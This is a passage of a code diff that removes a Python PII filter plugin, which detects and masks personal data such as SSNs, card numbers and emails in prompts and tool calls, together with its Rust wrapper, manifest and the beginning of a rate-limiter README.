enabled: bool = True - - -class PIIFilterConfig(BaseModel): - """Configuration for the PII Filter plugin.""" - - # Enable/disable detection for specific PII types - detect_ssn: bool = Field(default=True, description="Detect Social Security Numbers") - detect_bsn: bool = Field(default=True, description="Detect Dutch BSN (Burgerservicenummer)") - detect_credit_card: bool = Field(default=True, description="Detect credit card numbers") - detect_email: bool = Field(default=True, description="Detect email addresses") - detect_phone: bool = Field(default=True, description="Detect phone numbers") - detect_ip_address: bool = Field(default=True, description="Detect IP addresses") - detect_date_of_birth: bool = Field(default=True, description="Detect dates of birth") - detect_passport: bool = Field(default=True, description="Detect passport numbers") - detect_driver_license: bool = Field(default=True, description="Detect driver's license numbers") - detect_bank_account: bool = Field(default=True, description="Detect bank account numbers") - detect_medical_record: bool = Field(default=True, description="Detect medical record numbers") - - # Masking configuration - default_mask_strategy: MaskingStrategy = Field(default=MaskingStrategy.REDACT, description="Default masking strategy") - redaction_text: str = Field(default="[REDACTED]", description="Text to use for redaction") - - # Behavior configuration - block_on_detection: bool = Field(default=False, description="Block request if PII is detected") - log_detections: bool = Field(default=True, description="Log PII detections") - include_detection_details: bool = Field(default=True, description="Include detection details in metadata") - - # Resource limits for the Rust implementation - max_text_bytes: int = Field(default=10 * 1024 * 1024, gt=0, le=100 * 1024 * 1024, description="Maximum text payload size accepted by the Rust detector (max 100MB)") - max_nested_depth: int = Field(default=32, gt=0, le=1000, description="Maximum nested depth accepted by the Rust detector (max 1000)") - max_collection_items: int = Field(default=4096, gt=0, le=1_000_000, description="Maximum list or mapping size accepted by the Rust detector (max 1M)") - - # Custom patterns - custom_patterns: List[PIIPattern] = Field(default_factory=list, description="Custom PII patterns to detect") - - # Whitelist configuration - whitelist_patterns: List[str] = Field(default_factory=list, description="Patterns to exclude from PII detection") - - -class PIIDetector: - """Core PII detection logic.""" - - def __init__(self, config: PIIFilterConfig): - """Initialize the PII detector with configuration. - - Args: - config: PII filter configuration - """ - self.config = config - self.patterns: Dict[PIIType, List[Tuple[Pattern, MaskingStrategy]]] = {} - self._compile_patterns() - self._compile_whitelist() - - def _compile_patterns(self) -> None: - """Compile regex patterns for PII detection.""" - patterns = [] - - # Social Security Number patterns - if self.config.detect_ssn: - patterns.append(PIIPattern(type=PIIType.SSN, pattern=r"\b\d{3}-\d{2}-\d{4}\b", description="US Social Security Number", mask_strategy=MaskingStrategy.PARTIAL)) - - # Dutch BSN (Burgerservicenummer) patterns - 9-digit Dutch citizen service number - if self.config.detect_bsn: - # Match 9-digit numbers with BSN context keywords to avoid false positives - # Positive context: BSN, Citizen ID, Burgerservicenummer, ID, Order, Invoice, Tracking, Numbers, etc. - # This pattern requires context words before the 9-digit number - patterns.extend( - [ - # Explicit BSN context - PIIPattern( - type=PIIType.BSN, - pattern=r"\b(?:BSN|Citizen\s+ID|Burgerservicenummer)[:\s#]*\d{9}\b", - description="Dutch BSN with explicit context", - mask_strategy=MaskingStrategy.PARTIAL, - ), - # Generic ID context - # Note: Phone numbers are filtered by phone detector which runs first - PIIPattern( - type=PIIType.BSN, - pattern=r"\b(?:ID|Order|Invoice|Tracking|Numbers?)[:\s#]*\d{9}\b", - description="9-digit ID with generic context", - mask_strategy=MaskingStrategy.PARTIAL, - ), - # "My BSN is" pattern - PIIPattern( - type=PIIType.BSN, - pattern=r"\b(?:My\s+)?BSN\s+(?:is\s+)?\d{9}\b", - description="BSN with 'is' context", - mask_strategy=MaskingStrategy.PARTIAL, - ), - ] - ) - - # Credit Card patterns (basic validation for common formats) - if self.config.detect_credit_card: - patterns.append(PIIPattern(type=PIIType.CREDIT_CARD, pattern=r"\b(?:\d{4}[-\s]?){3}\d{4}\b", description="Credit card number", mask_strategy=MaskingStrategy.PARTIAL)) - - # Email patterns - if self.config.detect_email: - patterns.append(PIIPattern(type=PIIType.EMAIL, pattern=r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b", description="Email address", mask_strategy=MaskingStrategy.PARTIAL)) - - # Phone number patterns (US and international) - if self.config.detect_phone: - patterns.extend( - [ - PIIPattern(type=PIIType.PHONE, pattern=r"\b(?:\+?1[-.\s]?)?\(?\d{3}\)?[-.\s]?\d{3}[-.\s]?\d{4}\b", description="US phone number", mask_strategy=MaskingStrategy.PARTIAL), - PIIPattern(type=PIIType.PHONE, pattern=r"\b\+?[1-9]\d{1,14}\b", description="International phone number", mask_strategy=MaskingStrategy.PARTIAL), - ] - ) - - # IP Address patterns (IPv4 and IPv6) - if self.config.detect_ip_address: - patterns.extend( - [ - PIIPattern( - type=PIIType.IP_ADDRESS, - pattern=r"\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b", - description="IPv4 address", - mask_strategy=MaskingStrategy.REDACT, - ), - PIIPattern(type=PIIType.IP_ADDRESS, pattern=r"\b(?:[A-Fa-f0-9]{1,4}:){7}[A-Fa-f0-9]{1,4}\b", description="IPv6 address", mask_strategy=MaskingStrategy.REDACT), - ] - ) - - # Date of Birth patterns - if self.config.detect_date_of_birth: - patterns.extend( - [ - PIIPattern( - type=PIIType.DATE_OF_BIRTH, - pattern=r"\b(?:DOB|Date of Birth|Born|Birthday)[:\s]+\d{1,2}[-/]\d{1,2}[-/]\d{2,4}\b", - description="Date of birth with label", - mask_strategy=MaskingStrategy.REDACT, - ), - PIIPattern( - type=PIIType.DATE_OF_BIRTH, - pattern=r"\b(?:0[1-9]|1[0-2])[-/](?:0[1-9]|[12]\d|3[01])[-/](?:19|20)\d{2}\b", - description="Date in MM/DD/YYYY format", - mask_strategy=MaskingStrategy.REDACT, - ), - ] - ) - - # Passport patterns - if self.config.detect_passport: - patterns.append(PIIPattern(type=PIIType.PASSPORT, pattern=r"\b[A-Z]{1,2}\d{6,9}\b", description="Passport number", mask_strategy=MaskingStrategy.REDACT)) - - # Driver's License patterns (US states) - if self.config.detect_driver_license: - patterns.append( - PIIPattern( - type=PIIType.DRIVER_LICENSE, pattern=r"\b(?:DL|License|Driver\'?s? License)[#:\s]+[A-Z0-9]{5,20}\b", description="Driver's license number", mask_strategy=MaskingStrategy.REDACT - ) - ) - - # Bank Account patterns - if self.config.detect_bank_account: - patterns.extend( - [ - PIIPattern(type=PIIType.BANK_ACCOUNT, pattern=r"\b\d{8,17}\b", description="Bank account number", mask_strategy=MaskingStrategy.REDACT), # Generic bank account - PIIPattern(type=PIIType.BANK_ACCOUNT, pattern=r"\b[A-Z]{2}\d{2}[A-Z0-9]{4}\d{7}(?:\d{3})?\b", description="IBAN", mask_strategy=MaskingStrategy.PARTIAL), # IBAN - ] - ) - - # Medical Record patterns - if self.config.detect_medical_record: - patterns.append( - PIIPattern(type=PIIType.MEDICAL_RECORD, pattern=r"\b(?:MRN|Medical Record)[#:\s]+[A-Z0-9]{6,12}\b", description="Medical record number", mask_strategy=MaskingStrategy.REDACT) - ) - - # Add custom patterns - patterns.extend(self.config.custom_patterns) - - # Compile patterns by type - for pattern_config in patterns: - if pattern_config.enabled: - compiled = re.compile(pattern_config.pattern, re.IGNORECASE) - if pattern_config.type not in self.patterns: - self.patterns[pattern_config.type] = [] - self.patterns[pattern_config.type].append((compiled, pattern_config.mask_strategy)) - - def _compile_whitelist(self) -> None: - """Compile whitelist patterns.""" - self.whitelist_patterns = [re.compile(pattern, re.IGNORECASE) for pattern in self.config.whitelist_patterns] - - def _is_whitelisted(self, text: str, match_start: int, match_end: int) -> bool: - """Check if a matched pattern is whitelisted. - - Args: - text: The full text - match_start: Start position of the match - match_end: End position of the match - - Returns: - True if the match is whitelisted - """ - match_text = text[match_start:match_end] - for pattern in self.whitelist_patterns: - if pattern.search(match_text): - return True - return False - - def detect(self, text: str) -> Dict[PIIType, List[Dict]]: - """Detect PII in text. - - Args: - text: Text to scan for PII - - Returns: - Dictionary of detected PII by type - """ - detections = {} - - for pii_type, pattern_list in self.patterns.items(): - type_detections = [] - seen_ranges = [] # Track ranges we've already detected - - for pattern, mask_strategy in pattern_list: - for match in pattern.finditer(text): - if not self._is_whitelisted(text, match.start(), match.end()): - # Check if this overlaps with any existing detection - overlaps = False - for start, end in seen_ranges: - if (match.start() >= start and match.start() < end) or (match.end() > start and match.end() <= end) or (match.start() <= start and match.end() >= end): - overlaps = True - break - - if not overlaps: - type_detections.append({"value": match.group(), "start": match.start(), "end": match.end(), "mask_strategy": mask_strategy}) - seen_ranges.append((match.start(), match.end())) - - if type_detections: - detections[pii_type] = type_detections - - return detections - - def mask(self, text: str, detections: Dict[PIIType, List[Dict]]) -> str: - """Mask detected PII in text. - - Args: - text: Original text - detections: Dictionary of detected PII - - Returns: - Text with PII masked - """ - if not detections: - return text - - # Sort all detections by position (reverse order for replacement) - all_detections = [] - for pii_type, items in detections.items(): - for item in items: - item["type"] = pii_type - all_detections.append(item) - - all_detections.sort(key=lambda x: x["start"], reverse=True) - - # Apply masking - masked_text = text - for detection in all_detections: - strategy = detection.get("mask_strategy", self.config.default_mask_strategy) - masked_value = self._apply_mask(detection["value"], detection["type"], strategy) - masked_text = masked_text[: detection["start"]] + masked_value + masked_text[detection["end"] :] - - return masked_text - - def _apply_mask(self, value: str, pii_type: PIIType, strategy: MaskingStrategy) -> str: # noqa: PLR0911 - """Apply masking strategy to a value. - - Args: - value: Value to mask - pii_type: Type of PII - strategy: Masking strategy to apply - - Returns: - Masked value - """ - if strategy == MaskingStrategy.REDACT: - return self.config.redaction_text - - elif strategy == MaskingStrategy.PARTIAL: - # Show partial information based on type - if pii_type == PIIType.SSN: - if len(value) >= 4: - return f"***-**-{value[-4:]}" - return self.config.redaction_text - - elif pii_type == PIIType.BSN: - if len(value) >= 4: - return f"*****{value[-4:]}" - return self.config.redaction_text - - elif pii_type == PIIType.CREDIT_CARD: - if len(value) >= 4: - return f"****-****-****-{value[-4:]}" - return self.config.redaction_text - - elif pii_type == PIIType.EMAIL: - parts = value.split("@") - if len(parts) == 2: - name = parts[0] - if len(name) > 2: - return f"{name[0]}***{name[-1]}@{parts[1]}" - return f"***@{parts[1]}" - return self.config.redaction_text - - elif pii_type == PIIType.PHONE: - if len(value) >= 4: - return f"***-***-{value[-4:]}" - return self.config.redaction_text - - else: - # For other types, show first and last characters - if len(value) > 2: - return f"{value[0]}{'*' * (len(value) - 2)}{value[-1]}" - return self.config.redaction_text - - elif strategy == MaskingStrategy.HASH: - # Standard - import hashlib - - return f"[HASH:{hashlib.sha256(value.encode()).hexdigest()[:8]}]" - - elif strategy == MaskingStrategy.TOKENIZE: - # Standard - import uuid - - # In production, you'd store the mapping - return f"[TOKEN:{uuid.uuid4().hex[:8]}]" - - elif strategy == MaskingStrategy.REMOVE: - return "" - - return self.config.redaction_text - - -class PIIFilterPlugin(Plugin): - """PII Filter plugin for detecting and masking sensitive information.""" - - _python_deprecation_warned = False - - def __init__(self, config: PluginConfig): - """Initialize the PII filter plugin. - - Args: - config: Plugin configuration - """ - super().__init__(config) - self.pii_config = PIIFilterConfig.model_validate(self._config.config) - - # Auto-detect and use Rust implementation if available - if _RUST_AVAILABLE and _RustPIIDetector is not None: - self.detector = _RustPIIDetector(self.pii_config) - self.implementation = "Rust" - logger.info("🦀 PIIFilterPlugin initialized with Rust acceleration (5-100x speedup)") - else: - self.detector = PIIDetector(self.pii_config) - self.implementation = "Python" - if not self.__class__._python_deprecation_warned: - logger.warning(_PYTHON_PLUGIN_DEPRECATION_MESSAGE) - self.__class__._python_deprecation_warned = True - logger.info("🐍 PIIFilterPlugin initialized with Python implementation") - - self.detection_count = 0 - self.masked_count = 0 - - async def prompt_pre_fetch(self, payload: PromptPrehookPayload, context: PluginContext) -> PromptPrehookResult: - """Process prompt before retrieval to detect and mask PII. - - Args: - payload: The prompt payload - context: Plugin context - - Returns: - Result with masked PII or violation if blocking - """ - if not payload.args: - return PromptPrehookResult() - - all_detections = {} - modified_args = {} - - # Process each argument - for key, value in payload.args.items(): - if isinstance(value, str): - detections = self.detector.detect(value) - - if detections: - all_detections[key] = detections - - if self.pii_config.log_detections: - logger.warning(f"PII detected in prompt argument '{key}': {', '.join(detections.keys())}") - - if self.pii_config.block_on_detection: - detected_types = list(detections.keys()) - # Log at DEBUG level with full prompt content - if logger.isEnabledFor(logging.DEBUG): - logger.debug(f"PII filter blocking prompt - full content: {value}") - else: - # Log at WARNING level with redacted content - logger.warning(f"PII filter blocked prompt in argument '{key}' - detected types: {detected_types} (content redacted)") - violation = PluginViolation( - reason="PII detected in prompt", - description=f"Sensitive information detected in argument '{key}'", - code="PII_DETECTED", - details={"field": key, "types": detected_types, "count": sum(len(items) for items in detections.values())}, - ) - return PromptPrehookResult(continue_processing=False, violation=violation) - - # Mask the PII - masked_value = self.detector.mask(value, detections) - modified_args[key] = masked_value - self.masked_count += sum(len(items) for items in detections.values()) - else: - modified_args[key] = value - else: - modified_args[key] = value - - # Update context with detection metadata - if all_detections and self.pii_config.include_detection_details: - context.metadata["pii_detections"] = { - "pre_fetch": { - "detected": True, - "fields": list(all_detections.keys()), - "types": list(set(pii_type for field_detections in all_detections.values() for pii_type in field_detections.keys())), - "total_count": sum(len(items) for field_detections in all_detections.values() for items in field_detections.values()), - } - } - - # Return modified payload if PII was masked - if all_detections: - return PromptPrehookResult(modified_payload=PromptPrehookPayload(prompt_id=payload.prompt_id, args=modified_args)) - - return PromptPrehookResult() - - async def prompt_post_fetch(self, payload: PromptPosthookPayload, context: PluginContext) -> PromptPosthookResult: - """Process prompt after rendering to detect and mask PII in response. - - Args: - payload: The prompt result payload - context: Plugin context - - Returns: - Result with masked PII in messages - """ - if not payload.result.messages: - return PromptPosthookResult() - - modified = False - all_detections = {} - - # Process each message - for message in payload.result.messages: - if message.content and hasattr(message.content, "text"): - text = message.content.text - detections = self.detector.detect(text) - - if detections: - all_detections[f"message_{message.role}"] = detections - - if self.pii_config.log_detections: - logger.warning(f"PII detected in {message.role} message: {', '.join(detections.keys())}") - - # Mask the PII - masked_text = self.detector.mask(text, detections) - message.content.text = masked_text - modified = True - self.masked_count += sum(len(items) for items in detections.values()) - - # Update context with post-fetch detection metadata - if all_detections and self.pii_config.include_detection_details: - if "pii_detections" not in context.metadata: - context.metadata["pii_detections"] = {} - - context.metadata["pii_detections"]["post_fetch"] = { - "detected": True, - "messages": list(all_detections.keys()), - "types": list(set(pii_type for msg_detections in all_detections.values() for pii_type in msg_detections.keys())), - "total_count": sum(len(items) for msg_detections in all_detections.values() for items in msg_detections.values()), - } - - # Add summary statistics - context.metadata["pii_filter_stats"] = {"total_detections": self.detection_count, "total_masked": self.masked_count} - - if modified: - return PromptPosthookResult(modified_payload=payload) - - return PromptPosthookResult() - - async def tool_pre_invoke(self, payload: ToolPreInvokePayload, context: PluginContext) -> ToolPreInvokeResult: - """Detect and mask PII in tool arguments before invocation. - - Args: - payload: The tool payload containing arguments. - context: Plugin execution context. - - Returns: - Result with potentially modified tool arguments. - """ - logger.debug(f"Processing tool pre-invoke for tool '{payload.name}' with {len(payload.args) if payload.args else 0} arguments") - - if not payload.args: - return ToolPreInvokeResult() - - modified = False - all_detections = {} - - # Use intelligent nested processing for tool arguments - modified, detections = self._process_nested_data_for_pii(payload.args, "args", all_detections) - - if detections: - detected_types = list(set(pii_type for arg_detections in all_detections.values() for pii_type in arg_detections.keys())) - if self.pii_config.log_detections: - logger.warning(f"PII detected in tool '{payload.name}' arguments: {', '.join(map(str, detected_types))}") - - if detections and self.pii_config.block_on_detection: - detected_type_list = list(set(pii_type for arg_detections in all_detections.values() for pii_type in arg_detections.keys())) - # Log at DEBUG level with full content - if logger.isEnabledFor(logging.DEBUG): - logger.debug(f"PII filter blocking tool '{payload.name}' - full arguments: {payload.args}") - else: - # Log at WARNING level with redacted content - logger.warning(f"PII filter blocked tool '{payload.name}' arguments - detected types: {detected_type_list} (content redacted)") - violation = PluginViolation( - reason="PII detected in tool arguments", - description="Detected PII in tool arguments", - code="PII_DETECTED_IN_TOOL_ARGS", - details={ - "detected_types": detected_type_list, - "total_count": sum(len(items) for arg_detections in all_detections.values() for items in arg_detections.values()), - }, - ) - return ToolPreInvokeResult(continue_processing=False, violation=violation) - - # Store detection metadata - if all_detections and self.pii_config.include_detection_details: - if "pii_detections" not in context.metadata: - context.metadata["pii_detections"] = {} - - context.metadata["pii_detections"]["tool_pre_invoke"] = { - "detected": True, - "arguments": list(all_detections.keys()), - "types": list(set(pii_type for arg_detections in all_detections.values() for pii_type in arg_detections.keys())), - "total_count": sum(len(items) for arg_detections in all_detections.values() for items in arg_detections.values()), - } - - if modified: - logger.info(f"Modified tool '{payload.name}' arguments to mask PII") - return ToolPreInvokeResult(modified_payload=payload) - - return ToolPreInvokeResult() - - async def tool_post_invoke(self, payload: ToolPostInvokePayload, context: PluginContext) -> ToolPostInvokeResult: - """Detect and mask PII in tool results after invocation. - - Args: - payload: The tool result payload. - context: Plugin execution context. - - Returns: - Result with potentially modified tool results. - """ - logger.debug(f"Processing tool post-invoke for tool '{payload.name}', result type: {type(payload.result).__name__}") - - if not payload.result: - return ToolPostInvokeResult() - - modified = False - all_detections = {} - - # Handle string results - if isinstance(payload.result, str): - detections = self.detector.detect(payload.result) - if detections: - all_detections["result"] = detections - self.detection_count += sum(len(items) for items in detections.values()) - - if self.pii_config.log_detections: - logger.warning(f"PII detected in tool result: {', '.join(detections.keys())}") - - # Check if we should block - if self.pii_config.block_on_detection: - detected_types = list(detections.keys()) - # Log at DEBUG level with full content - if logger.isEnabledFor(logging.DEBUG): - logger.debug(f"PII filter blocking tool '{payload.name}' result - full content: {payload.result}") - else: - # Log at WARNING level with redacted content - logger.warning(f"PII filter blocked tool '{payload.name}' result - detected types: {detected_types} (content redacted)") - violation = PluginViolation( - reason="PII detected in tool result", - description=f"Detected {', '.join(detected_types)} in tool output", - code="PII_DETECTED_IN_TOOL_RESULT", - details={"detected_types": detected_types, "count": sum(len(items) for items in detections.values())}, - ) - return ToolPostInvokeResult(continue_processing=False, violation=violation) - - # Mask the PII - payload = payload.model_copy(update={"result": self.detector.mask(payload.result, detections)}) - modified = True - self.masked_count += sum(len(items) for items in detections.values()) - - # Handle dictionary results - use recursive traversal - elif isinstance(payload.result, dict): - modified, detections = self._process_nested_data_for_pii(payload.result, "result", all_detections) - if detections and self.pii_config.block_on_detection: - detected_types = list(set(pii_type for field_detections in all_detections.values() for pii_type in field_detections.keys())) - # Log at DEBUG level with full content - if logger.isEnabledFor(logging.DEBUG): - logger.debug(f"PII filter blocking tool '{payload.name}' result - full content: {payload.result}") - else: - # Log at WARNING level with redacted content - logger.warning(f"PII filter blocked tool '{payload.name}' result - detected types: {detected_types} (content redacted)") - violation = PluginViolation( - reason="PII detected in tool result", - description="Detected PII in nested tool result data", - code="PII_DETECTED_IN_TOOL_RESULT", - details={ - "detected_types": detected_types, - "total_count": sum(len(items) for field_detections in all_detections.values() for items in field_detections.values()), - }, - ) - return ToolPostInvokeResult(continue_processing=False, violation=violation) - - # Store detection metadata - if all_detections and self.pii_config.include_detection_details: - if "pii_detections" not in context.metadata: - context.metadata["pii_detections"] = {} - - context.metadata["pii_detections"]["tool_post_invoke"] = { - "detected": True, - "fields": list(all_detections.keys()), - "types": list(set(pii_type for field_detections in all_detections.values() for pii_type in field_detections.keys())), - "total_count": sum(len(items) for field_detections in all_detections.values() for items in field_detections.values()), - } - - # Update summary statistics - context.metadata["pii_filter_stats"] = {"total_detections": self.detection_count, "total_masked": self.masked_count} - - if modified: - logger.info(f"Modified tool '{payload.name}' result to mask PII") - return ToolPostInvokeResult(modified_payload=payload) - - return ToolPostInvokeResult() - - def _process_nested_data_for_pii(self, data: Any, path: str, all_detections: dict) -> tuple[bool, bool]: - """ - Recursively process nested data structures to find and mask PII. - - Args: - data: The data structure to process (dict, list, str, or other) - path: The current path in the data structure for logging - all_detections: Dictionary to store all detections found - - Returns: - Tuple of (modified, has_detections) where: - - modified: True if any data was modified - - has_detections: True if any PII was detected - """ - modified = False - has_detections = False - - if isinstance(data, str): - # Process string data - check for PII and also try to parse as JSON - detections = self.detector.detect(data) - if detections: - all_detections[path] = detections - self.detection_count += sum(len(items) for items in detections.values()) - has_detections = True - modified = True - if self.pii_config.log_detections: - logger.warning(f"PII detected in tool result at '{path}': {', '.join(detections.keys())}") - - # Try to parse as JSON and process nested content - try: - parsed_json = orjson.loads(data) - json_modified, json_detections = self._process_nested_data_for_pii(parsed_json, f"{path}(json)", all_detections) - has_detections = has_detections or json_detections - # Note: JSON modification will be handled by the caller using the detections - if json_modified: - modified = True - except (orjson.JSONDecodeError, TypeError): - # Not valid JSON, that's fine - pass - - elif isinstance(data, dict): - # Process dictionary recursively - for key, value in data.items(): - current_path = f"{path}.{key}" - value_modified, value_detections = self._process_nested_data_for_pii(value, current_path, all_detections) - - if value_modified and isinstance(value, str): - # Handle string masking including JSON strings - detections = all_detections.get(current_path, {}) - if detections: - data[key] = self.detector.mask(value, detections) - modified = True - - # Also check for JSON content that needs re-serialization - json_path = f"{current_path}(json)" - if any(path.startswith(json_path) for path in all_detections.keys()): - try: - parsed_json = orjson.loads(value) - # Apply masking to the parsed JSON - self._apply_pii_masking_to_parsed_json(parsed_json, json_path, all_detections) - # Re-serialize with masked data - data[key] = orjson.dumps(parsed_json).decode() - modified = True - except (orjson.JSONDecodeError, TypeError): - pass - elif value_modified: - modified = True - - has_detections = has_detections or value_detections - - elif isinstance(data, list): - # Process list recursively - for i, item in enumerate(data): - current_path = f"{path}[{i}]" - item_modified, item_detections = self._process_nested_data_for_pii(item, current_path, all_detections) - - if item_modified and isinstance(item, str): - # Handle string masking in list including JSON strings - detections = all_detections.get(current_path, {}) - if detections: - data[i] = self.detector.mask(item, detections) - modified = True - - # Also check for JSON content that needs re-serialization - json_path = f"{current_path}(json)" - if any(path.startswith(json_path) for path in all_detections.keys()): - try: - parsed_json = orjson.loads(item) - # Apply masking to the parsed JSON - self._apply_pii_masking_to_parsed_json(parsed_json, json_path, all_detections) - # Re-serialize with masked data - data[i] = orjson.dumps(parsed_json).decode() - modified = True - except (orjson.JSONDecodeError, TypeError): - pass - elif item_modified: - modified = True - - has_detections = has_detections or item_detections - - # For other types (int, bool, None, etc.), no processing needed - - return modified, has_detections - - def _apply_pii_masking_to_parsed_json(self, data: Any, base_path: str, all_detections: dict) -> None: - """ - Apply PII masking to parsed JSON data using detections that were already found. - - Args: - data: The parsed JSON data structure - base_path: The base path for this JSON data - all_detections: Dictionary containing all PII detections - - Returns: - None: Modifies data in place. - """ - if isinstance(data, str): - # Check if this path has detections - current_detections = all_detections.get(base_path, {}) - if current_detections: - # Strings are immutable — caller handles assignment - return - - elif isinstance(data, dict): - for key, value in data.items(): - current_path = f"{base_path}.{key}" - if isinstance(value, str): - detections = all_detections.get(current_path, {}) - if detections: - data[key] = self.detector.mask(value, detections) - else: - self._apply_pii_masking_to_parsed_json(value, current_path, all_detections) - - elif isinstance(data, list): - for i, item in enumerate(data): - current_path = f"{base_path}[{i}]" - if isinstance(item, str): - detections = all_detections.get(current_path, {}) - if detections: - data[i] = self.detector.mask(item, detections) - else: - self._apply_pii_masking_to_parsed_json(item, current_path, all_detections) - - async def shutdown(self) -> None: - """Cleanup when plugin shuts down.""" - logger.info(f"PII Filter plugin ({self.implementation}) shutting down. Total masked: {self.masked_count} items") - - -# Export Rust implementation for tests -RUST_AVAILABLE = _RUST_AVAILABLE -RustPIIDetector = _RustPIIDetector diff --git a/plugins/pii_filter/pii_filter_rust.py b/plugins/pii_filter/pii_filter_rust.py deleted file mode 100644 index bdc0ef110b..0000000000 --- a/plugins/pii_filter/pii_filter_rust.py +++ /dev/null @@ -1,172 +0,0 @@ -# -*- coding: utf-8 -*- -"""Rust PII Filter Wrapper - -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 -Authors: Mihai Criveti - -Thin Python wrapper around the Rust pii_filter implementation for seamless integration. -""" - -# Standard -import logging -from typing import Any, Dict, List, TYPE_CHECKING - -# Use TYPE_CHECKING to avoid circular import at runtime -if TYPE_CHECKING: - # Local - from .pii_filter import PIIFilterConfig - -logger = logging.getLogger(__name__) - -# Try to import Rust implementation from the installed package without mutating sys.path. -try: - # First-Party - from pii_filter_rust.pii_filter_rust import PIIDetectorRust as _RustDetector - - RUST_AVAILABLE = True - logger.info("🦀 Rust PII filter module imported successfully") -except ImportError as e: - RUST_AVAILABLE = False - _RustDetector = None - logger.warning(f"⚠️ Rust PII filter not available: {e}") - - -class RustPIIDetector: - """Thin wrapper around Rust PIIDetectorRust implementation. - - This class provides the same interface as the Python PIIDetector, - but delegates all operations to the high-performance Rust implementation. - - Example: - >>> config = PIIFilterConfig() - >>> detector = RustPIIDetector(config) - >>> detections = detector.detect("My SSN is 123-45-6789") - >>> print(detections) - {'ssn': [{'value': '123-45-6789', 'start': 10, 'end': 21, ...}]} - """ - - def __init__(self, config: "PIIFilterConfig"): - """Initialize Rust-backed PII detector. - - Args: - config: PII filter configuration (Pydantic model) - - Raises: - ImportError: If Rust implementation is not available - TypeError: If configuration type is invalid - ValueError: If configuration is invalid - """ - # Import here to avoid circular dependency - # Local - from .pii_filter import PIIFilterConfig # pylint: disable=import-outside-toplevel - - if not RUST_AVAILABLE: - raise ImportError("Rust implementation not available. Install with: pip install mcpgateway[rust]") - - # Validate config type - if not isinstance(config, PIIFilterConfig): - raise TypeError(f"Expected PIIFilterConfig, got {type(config)}") - - self.config = config - - # Convert Pydantic config to dictionary for Rust - config_dict = config.model_dump() - - try: - # Create Rust detector (this calls into Rust via PyO3) - self._rust_detector = _RustDetector(config_dict) - logger.debug("Rust PII detector initialized successfully") - except Exception as e: - logger.error(f"Failed to initialize Rust PII detector: {e}") - raise ValueError(f"Rust detector initialization failed: {e}") from e - - def detect(self, text: str) -> Dict[str, List[Dict]]: - """Detect PII in text using Rust implementation. - - Args: - text: Text to scan for PII - - Returns: - Dictionary mapping PII type to list of detections: - { - "ssn": [ - {"value": "123-45-6789", "start": 10, "end": 21, "mask_strategy": "partial"} - ], - "email": [ - {"value": "john@example.com", "start": 30, "end": 46, "mask_strategy": "partial"} - ] - } - - Raises: - RuntimeError: If PII detection fails. - - Example: - >>> detector.detect("SSN: 123-45-6789") - {'ssn': [{'value': '123-45-6789', 'start': 5, 'end': 16, 'mask_strategy': 'partial'}]} - """ - try: - return self._rust_detector.detect(text) - except Exception as e: - logger.error(f"Rust detection failed: {e}") - raise RuntimeError(f"PII detection failed: {e}") from e - - def mask(self, text: str, detections: Dict[str, List[Dict]]) -> str: - """Mask detected PII in text using Rust implementation. - - Args: - text: Original text - detections: Detection results from detect() - - Returns: - str: Masked text with PII replaced according to strategies - - Raises: - RuntimeError: If PII masking fails. - - Example: - >>> text = "SSN: 123-45-6789" - >>> detections = detector.detect(text) - >>> detector.mask(text, detections) - 'SSN: ***-**-6789' - """ - try: - return self._rust_detector.mask(text, detections) - except Exception as e: - logger.error(f"Rust masking failed: {e}") - raise RuntimeError(f"PII masking failed: {e}") from e - - def process_nested(self, data: Any, path: str = "") -> tuple[bool, Any, Dict]: - """Process nested data structures (dicts, lists, strings) using Rust. - - This method recursively traverses nested structures and detects/masks - PII in all string values found within. - - Args: - data: Data structure to process (dict, list, str, or other) - path: Current path in the structure (for logging) - - Returns: - tuple[bool, Any, Dict]: Tuple of (modified, new_data, detections) where: - - modified: True if any PII was found and masked - - new_data: The data structure with masked PII - - detections: Dictionary of all detections found - - Raises: - RuntimeError: If nested processing fails. - - Example: - >>> data = {"user": {"ssn": "123-45-6789", "name": "John"}} - >>> modified, new_data, detections = detector.process_nested(data) - >>> print(new_data) - {'user': {'ssn': '***-**-6789', 'name': 'John'}} - """ - try: - return self._rust_detector.process_nested(data, path) - except Exception as e: - logger.error(f"Rust nested processing failed: {e}") - raise RuntimeError(f"Nested PII processing failed: {e}") from e - - -# Export module-level availability flag -__all__ = ["RustPIIDetector", "RUST_AVAILABLE"] diff --git a/plugins/pii_filter/plugin-manifest.yaml b/plugins/pii_filter/plugin-manifest.yaml deleted file mode 100644 index 647f4a2bbd..0000000000 --- a/plugins/pii_filter/plugin-manifest.yaml +++ /dev/null @@ -1,13 +0,0 @@ -description: "PII Filter plugin for detecting and masking sensitive information" -author: "Mihai Criveti" -version: "0.1.0" -available_hooks: - - "prompt_pre_fetch" - - "prompt_post_fetch" - - "tool_pre_invoke" - - "tool_post_invoke" -default_configs: - detect_ssn: true - detect_credit_card: true - detect_email: true - default_mask_strategy: "partial" diff --git a/plugins/rate_limiter/README.md b/plugins/rate_limiter/README.md deleted file mode 100644 index b4d3ffb00a..0000000000 --- a/plugins/rate_limiter/README.md +++ /dev/null @@ -1,192 +0,0 @@ -# Rate Limiter Plugin - -> Author: Mihai Criveti -> Version: 0.1.0 - -Enforces rate limits per user, tenant, and tool across `tool_pre_invoke` and `prompt_pre_fetch` hooks. Supports pluggable counting algorithms (fixed window, sliding window, token bucket), an in-process memory backend (single-instance), and a Redis backend (shared across all gateway instances). - -## Hooks - -| Hook | When it runs | -|---|---| -| `tool_pre_invoke` | Before every tool call — checks `by_user`, `by_tenant`, `by_tool` | -| `prompt_pre_fetch` | Before every prompt fetch — checks `by_user`, `by_tenant`, `by_tool` | - -If any configured dimension is exceeded, the plugin returns a violation with HTTP 429. All requests include `X-RateLimit-*` headers. The most restrictive active dimension is surfaced (e.g. if both user and tenant limits are active, the one closest to exhaustion is reported). - -## Configuration - -```yaml -- name: RateLimiterPlugin - kind: plugins.rate_limiter.rate_limiter.RateLimiterPlugin - version: "0.1.0" - author: Mihai Criveti - hooks: - - prompt_pre_fetch - - tool_pre_invoke - mode: enforce # enforce | permissive | disabled - config: - by_user: "30/m" # per-user limit across all tools - by_tenant: "300/m" # shared limit across all users in a tenant - by_tool: # per-tool overrides 